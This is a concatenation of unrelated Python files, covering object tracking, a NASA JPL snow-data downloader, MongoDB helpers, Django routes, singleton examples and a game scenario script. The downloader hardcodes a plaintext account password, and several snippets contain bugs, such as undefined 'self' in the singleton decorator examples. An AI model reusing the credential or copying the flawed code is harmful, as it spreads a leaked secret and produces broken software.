self.update(row_ind, col_ind, detections, features)
self.logger.info(
'Frame #{}: {} target(s) active, {} object(s) detected'.format(self.frame_num, len(self.tracklets_active),
len(detections)))
def encode(self, detections, img):
"""
Encode detections using all encoders.
:param detections: A list of Detection objects.
:param img: The image ndarray.
:return: A list of dicts, with features generated by encoders for each detection.
"""
features = [{'box': detections[i].box} for i in range(len(detections))]
for encoder in self.encoders:
_features = encoder(detections, img)
for i in range(len(detections)):
features[i][encoder.name] = _features[i]
return features
def predict(self, img):
"""
Predict target positions in the incoming frame.
:param img: The image ndarray.
"""
if self.predictor is not None:
if self.predictor.__class__.__name__ is 'ECCPredictor':
self.predictor(self.tracklets_active, img, self.last_frame)
self.last_frame = img.copy()
else:
self.predictor(self.tracklets_active, img)
def update(self, row_ind, col_ind, detections, detection_features):
"""
Update the tracklets.
*****************************************************
Override this function for customized updating policy
*****************************************************
:param row_ind: A list of integers. Indices of the matched tracklets.
:param col_ind: A list of integers. Indices of the matched detections.
:param detection_boxes: A list of Detection objects.
:param detection_features: The features of the detections. It can be any form you want.
"""
# Update tracked tracklets' features
for i in range(len(row_ind)):
self.tracklets_active[row_ind[i]].update(self.frame_num, detections[col_ind[i]],
detection_features[col_ind[i]])
# Deal with unmatched tracklets
self.tracklets_to_kill = []
unmatched_tracklets = []
for i in range(len(self.tracklets_active)):
if i not in row_ind:
if self.tracklets_active[i].fade():
self.tracklets_to_kill.append(self.tracklets_active[i])
else:
unmatched_tracklets.append(self.tracklets_active[i])
# Kill tracklets that are unmatched for a while
for tracklet in self.tracklets_to_kill:
self.kill_tracklet(tracklet)
# Create new tracklets with unmatched detections
for i in range(len(detection_features)):
new_tracklets = []
if i not in col_ind:
new_tracklet = Tracklet(0, self.frame_num, detections[i], detection_features[i], max_ttl=self.max_ttl,
max_feature_history=self.max_feature_history,
max_detection_history=self.max_detection_history)
new_tracklets.append(new_tracklet)
self.add_tracklet(new_tracklet)
if self.predictor is not None:
self.predictor.initiate(new_tracklets)
def terminate(self):
"""
Terminate tracking and move all active tracklets to the finished ones.
"""
for tracklet in self.tracklets_active:
self.kill_tracklet(tracklet)
def assignment_matrix(self, similarity_matrix):
"""
Calculate assignment matrix using the matching algorithm. Only for debugging.
:param similarity_matrix: A 2D numpy array. The similarity matrix.
:return: A 2D numpy array with the same shape as the similarity matrix. The assignment matrix.
"""
row_ind, col_ind = self.matcher(similarity_matrix)
assignment_matrix = np.zeros([similarity_matrix.shape[0], similarity_matrix.shape[1]])
for i in range(len(row_ind)):
assignment_matrix[row_ind[i], col_ind[i]] = 1
# For debugging, display similarity matrix and assignment matrix
if similarity_matrix.shape[0] > 0:
print('row_ind: ', row_ind)
print('col_ind: ', col_ind)
cv2.imshow('similarity', cv2.resize(similarity_matrix, (600, 600), interpolation=cv2.INTER_NEAREST))
cv2.imshow('assignment', cv2.resize(assignment_matrix, (600, 600), interpolation=cv2.INTER_NEAREST))
return assignment_matrix
def add_tracklet(self, tracklet):
"""
Add a tracklet to the active tracklets after giving it a new ID.
:param tracklet: The tracklet to be added.
"""
tracklet.id = self.max_id
self.max_id += 1
self.tracklets_active.append(tracklet)
def kill_tracklet(self, tracklet):
self.tracklets_active.remove(tracklet)
# if tracklet.time_lived >= self.min_time_lived:
# self.tracklets_finished.append(tracklet)
|
"""Class definition for the MODSCAG snow cover fraction data type.
.. module:: modscag
:synopsis: Definition of the MODSCAG class
.. moduleauthor:: Kostas Andreadis <kandread@jpl.nasa.gov>
"""
import dbio
from datetime import timedelta
import datasets
import modis
import requests
from requests.auth import HTTPDigestAuth
import tempfile
import lxml.html
import subprocess
import glob
import shutil
import numpy as np
table = "snow.modscag"
username = "akostas"
password = "m0red@7@!"
def dates(dbname):
dts = datasets.dates(dbname, table)
return dts
def download(dbname, dts, bbox):
"""Downloads the MODSCAG snow cover fraction data product for a specific
date *dt* and imports it into the PostGIS database *dbname*."""
res = 0.01
tiles = modis.findTiles(bbox)
for dt in [dts[0] + timedelta(dti) for dti in range((dts[-1] - dts[0]).days + 1)]:
temppath = tempfile.mkdtemp()
url = "https://snow-data.jpl.nasa.gov/modscag-historic/{0}/{1}".format(dt.year, dt.strftime("%j"))
r = requests.get(url, auth=HTTPDigestAuth(username, password))
if r.status_code == 200:
dom = lxml.html.fromstring(r.text)
links = [link for link in dom.xpath('//a/@href') if link.find("snow_fraction.tif") > 0]
for t in tiles:
filenames = filter(lambda f: f.find("h{0:02d}v{1:02d}".format(t[1], t[0])) > 0, links)
if len(filenames) > 0:
filename = filenames[0]
r = requests.get("{0}/{1}".format(url, filename), auth=HTTPDigestAuth(username, password))
with open("{0}/{1}".format(temppath, filename), 'wb') as fout:
fout.write(r.content)
tifs = glob.glob("{0}/*.tif".format(temppath))
if len(tifs) > 0:
subprocess.call(["gdal_merge.py", "-o", "{0}/snow.tif".format(temppath)] + tifs)
cmd = " ".join(["gdal_calc.py", "-A", "{0}/snow.tif".format(temppath), "--outfile={0}/snow1.tif".format(
temppath), "--NoDataValue=-9999", "--calc=\"(A<101.0)*(A+9999.0)-9999.0\""])
subprocess.call(cmd, shell=True)
cmd = " ".join(["gdalwarp", "-t_srs", "'+proj=latlong +ellps=sphere'", "-tr", str(
res), str(-res), "{0}/snow1.tif".format(temppath), "{0}/snow2.tif".format(temppath)])
subprocess.call(cmd, shell=True)
if bbox is None:
pstr = []
else:
pstr = ["-projwin", str(bbox[0]), str(bbox[3]), str(bbox[2]), str(bbox[1])]
subprocess.call(["gdal_translate", "-a_srs", "epsg:4326"] + pstr + ["{0}/snow2.tif".format(temppath), "{0}/snow3.tif".format(temppath)])
dbio.ingest(dbname, "{0}/snow3.tif".format(temppath), dt, table, False)
shutil.rmtree(temppath)
else:
print("MODSCAG data not available for {0}. Skipping download!".format(
dt.strftime("%Y-%m-%d")))
class Modscag(object):
def __init__(self):
"""Initialize MODSCAG snow cover fraction object."""
self.statevar = ["swq"]
self.obsvar = "snow_cover"
self.res = 0.01
self.stddev = 0.05
self.tablename = table
def x(self, dt, models):
"""Retrieve state variable from database."""
data = {}
db = dbio.connect(models.dbname)
cur = db.cursor()
for s in self.statevar:
sql = "select ensemble,st_x(geom),st_y(geom),val from (select ensemble,(ST_PixelAsCentroids(rast)).* from {0}.{1} where fdate=date '{2}-{3}-{4}') foo group by ensemble,geom order by ensemble".format(
models.name, s, dt.year, dt.month, dt.day)
cur.execute(sql)
e, lon, lat, vals = zip(*cur.fetchall())
gid = [models[0].lgid[(l[0], l[1])] for l in zip(lat, lon)]
nens = max(e)
data[s] = np.array(vals).reshape((len(vals) / nens, nens))
lat = np.array(lat).reshape((len(lat) / nens, nens))
lon = np.array(lon).reshape((len(lon) / nens, nens))
gid = np.array(gid).reshape((len(gid) / nens, nens))
cur.close()
db.close()
return data, lat, lon, gid
def get(self, dt, models):
"""Retrieve observations from database for date *dt*."""
db = dbio.connect(models.dbname)
cur = db.cursor()
sql = "select st_x(geom),st_y(geom),val from (select (st_pixelascentroids(st_clip(rast,geom))).* from {0},{1}.basin where st_intersects(rast,geom) and fdate=date '{2}-{3}-{4}') foo".format(
self.tablename, models.name, dt.year, dt.month, dt.day)
cur.execute(sql)
if bool(cur.rowcount):
lon, lat, data = zip(*cur.fetchall())
data = np.array(data).reshape((len(data), 1))
lat = np.array(lat).reshape((len(lat), 1))
lon = np.array(lon).reshape((len(lon), 1))
self.nobs = len(data)
else:
data = lat = lon = None
cur.close()
db.close()
return data, lat, lon
|
from pprint import pprint, pformat # pylint: disable=unused-import
import logging
import time
from copy import deepcopy
# from collections import defaultdict
from pymongo import UpdateOne, InsertOne
from pymongo.errors import BulkWriteError
def bulk_write(db, item_type, ops, stat=None, retries=3, log_first_failop=True):
"""
Tries to apply `ops` Update operations to `item_type`
collection with `bulk_write` method.
Gives up if `retries` retries failed.
Args:
db - pymongo collection object
item_type - name of collection
ops - list of operations like UpdateOne
stat - instance of `ioweb.stat:Stat`
retries - number of retries
"""
if stat:
stat.inc("bulk-write-%s" % item_type)
for retry in range(retries):
try:
res = db[item_type].bulk_write(ops, ordered=False)
except BulkWriteError as ex:
# TODO: repeat only failed operations!!!
# TODO: repeat only in case of DUP (11000) errors
if retry == (retries - 1):
if log_first_failop:
logging.error(
"First failed operation:\n%s",
pformat(ex.details["writeErrors"][0]),
)
raise
else:
if stat:
stat.inc("bulk-write-%s-retry" % item_type)
else:
if stat:
stat.inc(
"bulk-write-%s-upsert" % item_type, res.bulk_api_result["nUpserted"]
)
stat.inc(
"bulk-write-%s-change" % item_type, res.bulk_api_result["nModified"]
)
break
return res
class BulkWriter(object):
def __init__(self, db, item_type, bulk_size=100, stat=None, retries=3):
self.database = db
self.item_type = item_type
self.stat = stat
self.retries = retries
self.bulk_size = bulk_size
self.ops = []
def _write_ops(self):
res = bulk_write(self.database, self.item_type, self.ops, self.stat)
self.ops = []
return res
def update_one(self, *args, **kwargs):
self.ops.append(UpdateOne(*args, **kwargs))
if len(self.ops) >= self.bulk_size:
return self._write_ops()
else:
return None
def insert_one(self, *args, **kwargs):
self.ops.append(InsertOne(*args, **kwargs))
if len(self.ops) >= self.bulk_size:
return self._write_ops()
else:
return None
def flush(self):
if self.ops:
return self._write_ops()
else:
return None
def iterate_collection(
db,
item_type,
query,
sort_field,
iter_chunk=1000,
fields=None,
infinite=False,
limit=None,
):
"""
Iterate over `db[item_type]` collection items matching `query`
sorted by `sort_field`.
Intenally, it fetches chunk of `iter_chunk` items at once and
iterates over it. Then fetch next chunk.
"""
recent_id = None
count = 0
query = deepcopy(query) # avoid side effects
if sort_field in query:
logging.error(
"Function `iterate_collection` received query"
" that contains a key same as `sort_field`."
" That might goes unexpected and weird ways."
)
while True:
if recent_id:
query[sort_field] = {"$gt": recent_id}
else:
if sort_field in query:
del query[sort_field]
items = list(
db[item_type].find(query, fields, sort=[(sort_field, 1)], limit=iter_chunk)
)
if not items:
if infinite:
sleep_time = 5
logging.debug("No items to process. Sleeping %d seconds", sleep_time)
time.sleep(sleep_time)
recent_id = None
else:
return
else:
for item in items:
yield item
recent_id = item[sort_field]
count += 1
if limit and count >= limit:
return
def bulk_dup_insert(db, item_type, ops, dup_key, stat=None):
if stat:
stat.inc("bulk-dup-insert-%s" % item_type, len(ops))
all_keys = set()
uniq_ops = []
for op in ops:
if not isinstance(op, InsertOne):
raise Exception(
"Function bulk_dup_insert accepts only"
" InsertOne operations. Got: %s" % op.__class__.__name__
)
if dup_key not in op._doc: # pylint: disable=protected-access
raise Exception(
"Operation for bulk_dup_insert"
' does not have key "%s": %s'
% (dup_key, str(op._doc)[:1000]) # pylint: disable=protected-access
)
key = op._doc[dup_key] # pylint: disable=protected-access
if key not in all_keys:
all_keys.add(key)
uniq_ops.append(op)
try:
db[item_type].bulk_write(uniq_ops, ordered=False)
except BulkWriteError as ex:
if (
all(x["code"] == 11000 for x in ex.details["writeErrors"])
and not ex.details["writeConcernErrors"]
):
error_keys = set(x["op"][dup_key] for x in ex.details["writeErrors"])
res_keys = list(all_keys - error_keys)
if stat:
stat.inc("bulk-dup-insert-%s-inserted" % item_type, len(res_keys))
return res_keys
else:
raise
else:
if stat:
stat.inc("bulk-dup-insert-%s-inserted" % item_type, len(all_keys))
return list(all_keys)
def bulk_simple_insert(db, item_type, ops, stat=None):
if stat:
stat.inc("bulk-dup-insert-%s" % item_type, len(ops))
for op in ops:
if not isinstance(op, InsertOne):
raise Exception(
"Function simple_bulk_insert accepts only"
" InsertOne operations. Got: %s" % op.__class__.__name__
)
try:
db[item_type].bulk_write(ops, ordered=False)
except BulkWriteError as ex:
if (
all(x["code"] == 11000 for x in ex.details["writeErrors"])
and not ex.details["writeConcernErrors"]
):
if stat:
stat.inc(
"bulk-dup-insert-%s-inserted" % item_type,
len(ops) - len(ex.details["writeErrors"]),
)
else:
raise
else:
if stat:
stat.inc("bulk-dup-insert-%s-inserted" % item_type, len(ops))
|
from django.urls import path
from savings import views
app_name = "savings"
urlpatterns = [
path('indexs/', views.Index.as_view(), name="indexs"),
path('list_users/', views.ListUsers.as_view(), name="list_users"),
path('user_lists/', views.list_Users, name="user_lists"),
path('list_saving/', views.ListSaving.as_view(), name="list_saving"),
path('saving_list/', views.list_Saving, name="saving_list"),
path('saving_create/', views.SavingCreate.as_view(), name="saving_create"),
path('create_saving/', views.createCundina, name="create_saving"),
path('user_creates/', views.UserCreate.as_view(), name="user_creates"),
path('create_users/', views.createUser, name="create_users"),
]
|
from django.contrib import admin
from django.urls import path
from .views import SocialListView, SocialUpdateView
urlpatterns = [
path('social/list/', SocialListView.as_view(), name='socialList'),
path('social/update/<int:pk>/', SocialUpdateView.as_view(), name='socialUpdate')
]
|
a = int(input("fyrri tala "))
b = int(input("seinni tala "))
def multiple (a,b):
result = a * b
return result
samtals = multiple(a, b)
print("n * n = ", samtals) |
# coding=utf-8
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import githon
requirements = open('requirements.pip').read().splitlines()
kw = dict(
name = 'githon',
version = '0.7.0',
description = 'A simple Data Scraping library for GitHub REST API v3',
long_description = open('README.md', 'r').read(),
author = 'Marcos Vinícius Brás',
author_email = 'marcosvbras@gmail.com',
url = 'https://github.com/marcosvbras/githon',
download_url = 'https://github.com/marcosvbras/githon',
license='Apache',
py_modules = ['githon'],
packages=['githon'],
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Internet',
'Topic :: Software Development :: Libraries :: Python Modules',
],
keywords='data github scraping api',
install_requires=requirements,
python_requires='~=3.3',
)
setup(**kw)
|
class MyBeautifulGril(object):
"""我的漂亮女神"""
__instance = None
__isFirstInit = False
def __new__(cls, name):
if not cls.__instance:
MyBeautifulGril.__instance = super().__new__(cls)
return cls.__instance
def __init__(self, name):
if not self.__isFirstInit:
self.__name = name
print("遇见" + name + ",我一见钟情!")
MyBeautifulGril.__isFirstInit = True
else:
print("遇见" + name + ",我置若罔闻!")
def showMyHeart(self):
print(self.__name + "就我心中的唯一!")
# 各种singleton实现方式
########################################################################################################################
class Singleton1(object):
"""单例实现方式一"""
__instance = None
__isFirstInit = False
def __new__(cls, name):
if not cls.__instance:
Singleton1.__instance = super().__new__(cls)
return cls.__instance
def __init__(self, name):
if not self.__isFirstInit:
self.__name = name
Singleton1.__isFirstInit = True
def getName(self):
return self.__name
# # # Test
# tony = Singleton1("Tony")
# karry = Singleton1("Karry")
# print(tony.getName(), karry.getName())
# print("id(tony):", id(tony), "id(karry):", id(karry))
# print("tony == karry:", tony == karry)
# 方式二
#========================================================================================
class Singleton2(type):
"""单例实现方式二"""
def __init__(cls, what, bases=None, dict=None):
super().__init__(what, bases, dict)
cls._instance = None # 初始化全局变量cls._instance为None
def __call__(cls, *args, **kwargs):
# 控制对象的创建过程,如果cls._instance为None则创建,否则直接返回
if cls._instance is None:
cls._instance = super().__call__(*args, **kwargs)
return cls._instance
class CustomClass(metaclass=Singleton2):
"""用户自定义的类"""
def __init__(self, name):
self.__name = name
def getName(self):
return self.__name
tony = CustomClass("Tony")
karry = CustomClass("Karry")
print(tony.getName(), karry.getName())
print("id(tony):", id(tony), "id(karry):", id(karry))
print("tony == karry:", tony == karry)
# 方式三
#========================================================================================
def singletonDecorator(cls, *args, **kwargs):
"""定义一个单例装饰器"""
instance = {}
def wrapperSingleton(*args, **kwargs):
if cls not in instance:
instance[cls] = cls(*args, **kwargs)
return instance[cls]
return wrapperSingleton
@singletonDecorator
class Singleton3:
"""使用单例装饰器修饰一个类"""
def __init__(selfself, name):
self.__name = name
def getName(selfself):
return self.__name
# tony = Singleton3("Tony")
# karry = Singleton3("Karry")
# print(tony.getName(), karry.getName())
# print("id(tony):", id(tony), "id(karry):", id(karry))
# print("tony == karry:", tony == karry)
# Version 2.0
########################################################################################################################
@singletonDecorator
class MyBeautifulGril(object):
"""我的漂亮女神"""
def __init__(selfself, name):
self.__name = name
if self.__name == name:
print("遇见" + name + ",我一见钟情!")
else:
print("遇见" + name + ",我置若罔闻!")
def showMyHeart(selfself):
print(self.__name + "就我心中的唯一!")
# Test
########################################################################################################################
# def TestLove():
# jenny = MyBeautifulGril("Jenny")
# jenny.showMyHeart()
# kimi = MyBeautifulGril("Kimi")
# kimi.showMyHeart()
# print("id(jenny):", id(jenny), " id(kimi):", id(kimi))
#
#
# TestLove()
"""
使用装饰器
"""
# def singleton(cls):
# __instance = {}
# def _singleton(*args, **kwargs):
# if cls not in __instance:
# __instance[cls] = cls(*args, **kwargs)
# return __instance[cls]
# return _singleton
#
# @singleton
# class A(object):
# a = 1
#
# def __init__(self, x=0):
# self._x = x
#
# a = A(2)
# b = A(3)
# print(a, a.__dict__)
# print(b, b.__dict__)
# print(b._x)
"""
使用类
"""
# class Singleton(object):
#
# def __init__(self):
# pass
#
# @classmethod
# def instance(cls, *args, **kwargs):
# if not hasattr(cls, '_instance'):
# cls._instance = cls(*args, **kwargs)
# return cls._instance
#
# a = Singleton().instance()
# b = Singleton().instance()
# print(a, b)
# """
# 多线程测试
# """
# import threading
#
# class Singleton(object):
#
# __instance_lock = threading.Lock()
# def __init__(self):
# import time
# time.sleep(1)
#
# @classmethod
# def instance(cls, *args, **kwargs):
# with Singleton.__instance_lock:
# if not hasattr(cls, '_instance'):
# cls._instance = cls(*args, **kwargs)
# return cls._instance
#
#
# def task(arg):
# s = Singleton.instance()
# print(s)
#
#
# for i in range(10):
# t = threading.Thread(target=task, args=[i,])
# t.start()
import unittest
class TestStringMethods(unittest.TestCase):
def test_upper(self):
self.assertEqual('foo'.upper(), 'FOO')
def test_isupper(self):
self.assertTrue('FOO'.isupper())
self.assertFalse('Foo'.isupper())
def test_split(self):
s = 'hello world'
self.assertEqual(s.split(), ['hello', 'world'])
# check that s.split fails when the separator is not a string
with self.assertRaises(TypeError):
print(s.split(2))
#
# if __name__ == '__main__':
# unittest.main()
import unittest
def calc(expression):
return eval(expression)
def add_test(name, asserts):
def test_method(asserts):
def fn(self):
left, right = asserts.split('=')
expected = str(calc(left))
self.assertEqual(expected, right)
return fn
d = {'test1': test_method(asserts)}
cls = type(name, (unittest.TestCase,), d)
globals()[name] = cls
if __name__ == '__main__':
for i, t in enumerate([
"1+2=3",
"3*5*6=90"]):
add_test("Test%d" % i, t)
unittest.main()
|
import re
DOMAIN_PATTERN = re.compile(
r'^(?:[a-z\d\-_]{1,62}\.){0,125}'
r'(?:[a-z\d](?:\-(?=\-*[a-z\d])|[a-z]|\d){0,62}\.)'
r'[a-z\d]{1,63}$'
)
# The srcset width tolerance dictates the _maximum tolerated size_
# difference between an image's downloaded size and its rendered size.
# For example, setting this value to 10 means that an image will not
# render more than 10% larger or smaller than its native size.
SRCSET_WIDTH_TOLERANCE = 0.08
# The minimum srcset width tolerance.
SRCSET_MIN_WIDTH_TOLERANCE = 0.01
# The default srcset target ratios.
SRCSET_DPR_TARGET_RATIOS = range(1, 6)
SRCSET_MAX_SIZE = 8192
# Representation of an image with a width of zero. This value is used
# in validation contexts, i.e. "is the width of the passed or requested
# image greater than or equal to the 'zero width image'."
IMAGE_ZERO_WIDTH = 0
# The minimum width of a default generated image-width.
IMAGE_MIN_WIDTH = 100
# The maximum width of a default generated image-width.
IMAGE_MAX_WIDTH = 8192
# The default dpr qualities used when variable output quality is enabled.
DPR_QUALITIES = {1: 75, 2: 50, 3: 35, 4: 23, 5: 20}
SRCSET_TARGET_WIDTHS = [
100, 116, 135, 156, 181, 210, 244, 283,
328, 380, 441, 512, 594, 689, 799, 927,
1075, 1247, 1446, 1678, 1946, 2257, 2619,
3038, 3524, 4087, 4741, 5500, 6380, 7401, 8192]
|
# By Rakeen Rouf
import pandas as pd
import os
import platform
import time
class TxtToCsv:
"""
Converts ae txt files into csv. History.csv keeps track of incoming data. The CSV is updated based on modification
time
"""
def __init__(self, data_file='C:/Users/rakee/Downloads/livedata.txt'):
self.data = pd.DataFrame()
self.data_file = data_file
def loaddata(self):
try:
self.data = pd.read_fwf(self.data_file, skiprows=7)
# Lets just keep the data points which have id == 1
self.data = self.data.loc[self.data['ID'] == '1']
except KeyError:
self.data = pd.read_fwf(self.data_file, skiprows=8)
print(self.data.columns.values)
# Lets just keep the data points which have id == 1
self.data = self.data.loc[self.data['ID'] == '1']
# Lets read in how many lines we had in the last iter
line_number = int(pd.read_fwf('History.txt')['History'][0])
# cum sum from last iter
cum_sum_ener = int(pd.read_fwf('History.txt')['History'][1])
temp_data = pd.DataFrame(columns=self.data.columns)
self.data = pd.concat([temp_data, self.data.iloc[line_number:]], join="inner")
self.data = self.data.astype('float')
self.data['cum_sum_ENER'] = self.data['ENER'].cumsum() + cum_sum_ener
txt_file = open("History.txt", "w") # Lets update our history file for the next iter
txt_file.write('History\n')
txt_file.write(str(len(self.data)))
txt_file.write('\n')
txt_file.write(str(int(self.data['cum_sum_ENER'].iloc[-1])))
txt_file.close()
plot_data = self.data[['SSSSSSSS.mmmuuun', 'cum_sum_ENER', 'DURATION', 'AMP']]
plot_data.to_csv('C:/Users/rakee/Downloads/fog_plot_data.txt')
def modification_date(self):
if platform.system() == 'Windows':
return os.path.getmtime(self.data_file)
else:
stat = os.stat(self.data_file)
return stat.st_mtime
if __name__ == '__main__':
# Lets write a txt file containing all running history
txt_file_writer = open("History.txt", "w")
txt_file_writer.write('History\n')
txt_file_writer.write(str(0))
txt_file_writer.write('\n')
txt_file_writer.write(str(0))
txt_file_writer.close()
txt_to_csv = TxtToCsv()
mod_time = 0
while True:
cur_mod_time = txt_to_csv.modification_date()
if mod_time < cur_mod_time:
time.sleep(0.01)
txt_to_csv.loaddata()
print('works')
mod_time = txt_to_csv.modification_date()
|
from django.conf import settings
from django.conf.urls.static import static
from django.urls import path
from . import views
app_name = 'customer'
urlpatterns = [
path('create-customer/', views.create_cutomer, name='create_customer'),
path('', views.home, name='home'),
path('login-customer/', views.login_customer, name='login_customer'),
path('logout-customer/', views.logout_customer, name='logout_customer'),
path('profile-customer/', views.profile_customer, name='profile_customer'),
path('customer-change-password/', views.customer_change_password, name='customer_change_password'),
path('customer-forgot-password/', views.customer_forgot_password, name='customer_forgot_password'),
path('customer-reset-password/', views.customer_reset_password, name='customer_reset_password'),
path('create-staff/', views.create_staff, name='create_staff'),
] + static(settings.STATIC_URL,
document_root=settings.STATIC_ROOT) # is this import of setting correct? check this later
|
#!/usr/bin/env python
import numpy as np
import kaldiio
from ABXpy.misc import any2h5features
import os, shutil
#read from feats.scp
#add feats scp direc
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("feats_file", help="path to the ivector.scp we're going to use as example")
parser.add_argument("target_dir", help="path to target dir")
parser.add_argument("--output_name", type=str, default="ivector.h5f", help="name to output file (ivectors.h5f or lda_ivectors.h5f")
parser.parse_args()
args, leftovers = parser.parse_known_args()
print(args.output_name)
try:
shutil.rmtree('{}/tmp'.format(args.target_dir))
except:
pass
if os.path.exists('{}/{}'.format(args.target_dir, args.output_name)):
os.remove('{}/{}'.format(args.target_dir, args.output_name))
os.makedirs('{}/tmp'.format(args.target_dir))
with kaldiio.ReadHelper('scp:{}'.format(args.feats_file)) as reader:
filenames=[]
times=np.array([0])
for key, numpy_array in reader:
filenames.append(key)
ivector_2d = np.expand_dims(numpy_array.astype(np.float64), axis=0)
np.savez('{}/tmp/{}'.format(args.target_dir, key), features=ivector_2d, time=times)
print('aaa')
any2h5features.convert('{}/tmp/'.format(args.target_dir), '{}/{}'.format(args.target_dir, args.output_name))
print(args.target_dir, args.output_name)
print('bbb')
# shutil.rmtree('{}/tmp'.format(args.target_dir))
|
from itty import *
@error(500)
def my_great_500(request, exception):
html_output = """
<html>
<head>
<title>Application Error! OH NOES!</title>
</head>
<body>
<h1>OH NOES!</h1>
<p>Yep, you broke it.</p>
<p>Exception: %s</p>
</body>
</html>
""" % exception
response = Response(html_output, status=500)
return response.send(request._start_response)
@register('get', '/hello')
def hello(request):
return 'Hello errors!'
@register('get', '/test_404')
def test_404(request):
raise NotFound('Not here, sorry.')
return 'This should never happen.'
@register('get', '/test_500')
def test_500(request):
raise ServerError('Oops.')
return 'This should never happen either.'
@register('get', '/test_other')
def test_other(request):
raise RuntimeError('Oops.')
return 'This should never happen either either.'
@register('get', '/test_403')
def test_403(request):
raise Forbidden('No soup for you!')
return 'This should never happen either either either.'
@register('get', '/test_redirect')
def test_redirect(request):
raise Redirect('/hello')
run_itty()
|
from ED6ScenarioHelper import *
def main():
# 格兰赛尔
CreateScenaFile(
FileName = 'T4222 ._SN',
MapName = 'Grancel',
Location = 'T4222.x',
MapIndex = 1,
MapDefaultBGM = "ed60017",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'克劳斯市长', # 9
'莉拉', # 10
'梅贝尔市长', # 11
'科林兹校长', # 12
'茜亚', # 13
'金', # 14
'里拉老人', # 15
'布莉姆', # 16
)
DeclEntryPoint(
Unknown_00 = 0,
Unknown_04 = 0,
Unknown_08 = 6000,
Unknown_0C = 4,
Unknown_0E = 0,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 45,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 0,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT07/CH02350 ._CH', # 00
'ED6_DT07/CH02370 ._CH', # 01
'ED6_DT07/CH02360 ._CH', # 02
'ED6_DT07/CH02600 ._CH', # 03
'ED6_DT07/CH02620 ._CH', # 04
'ED6_DT07/CH02540 ._CH', # 05
'ED6_DT07/CH00070 ._CH', # 06
'ED6_DT07/CH02460 ._CH', # 07
'ED6_DT07/CH02230 ._CH', # 08
'ED6_DT07/CH02240 ._CH', # 09
'ED6_DT07/CH01100 ._CH', # 0A
'ED6_DT07/CH01350 ._CH', # 0B
)
AddCharChipPat(
'ED6_DT07/CH02350P._CP', # 00
'ED6_DT07/CH02370P._CP', # 01
'ED6_DT07/CH02360P._CP', # 02
'ED6_DT07/CH02600P._CP', # 03
'ED6_DT07/CH02620P._CP', # 04
'ED6_DT07/CH02540P._CP', # 05
'ED6_DT07/CH00070P._CP', # 06
'ED6_DT07/CH02460P._CP', # 07
'ED6_DT07/CH02230P._CP', # 08
'ED6_DT07/CH02240P._CP', # 09
'ED6_DT07/CH01100P._CP', # 0A
'ED6_DT07/CH01350P._CP', # 0B
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x181,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = 0,
TalkScenaIndex = 6,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 1,
ChipIndex = 0x1,
NpcIndex = 0x181,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = 0,
TalkScenaIndex = 7,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 2,
ChipIndex = 0x2,
NpcIndex = 0x181,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = 0,
TalkScenaIndex = 8,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 3,
ChipIndex = 0x3,
NpcIndex = 0x181,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = 0,
TalkScenaIndex = 5,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 5,
ChipIndex = 0x5,
NpcIndex = 0x181,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 6,
ChipIndex = 0x6,
NpcIndex = 0x181,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -139550,
Z = 4000,
Y = 9480,
Direction = 0,
Unknown2 = 0,
Unknown3 = 10,
ChipIndex = 0xA,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 4,
)
DeclNpc(
X = -78950,
Z = 0,
Y = 5960,
Direction = 359,
Unknown2 = 0,
Unknown3 = 11,
ChipIndex = 0xB,
NpcIndex = 0x181,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = 0,
TalkScenaIndex = 3,
)
ScpFunction(
"Function_0_20A", # 00, 0
"Function_1_358", # 01, 1
"Function_2_362", # 02, 2
"Function_3_378", # 03, 3
"Function_4_3D9", # 04, 4
"Function_5_59A", # 05, 5
"Function_6_5A7", # 06, 6
"Function_7_EE3", # 07, 7
"Function_8_EF0", # 08, 8
"Function_9_187E", # 09, 9
"Function_10_2539", # 0A, 10
"Function_11_2574", # 0B, 11
"Function_12_2FB0", # 0C, 12
"Function_13_358A", # 0D, 13
"Function_14_3737", # 0E, 14
)
def Function_0_20A(): pass
label("Function_0_20A")
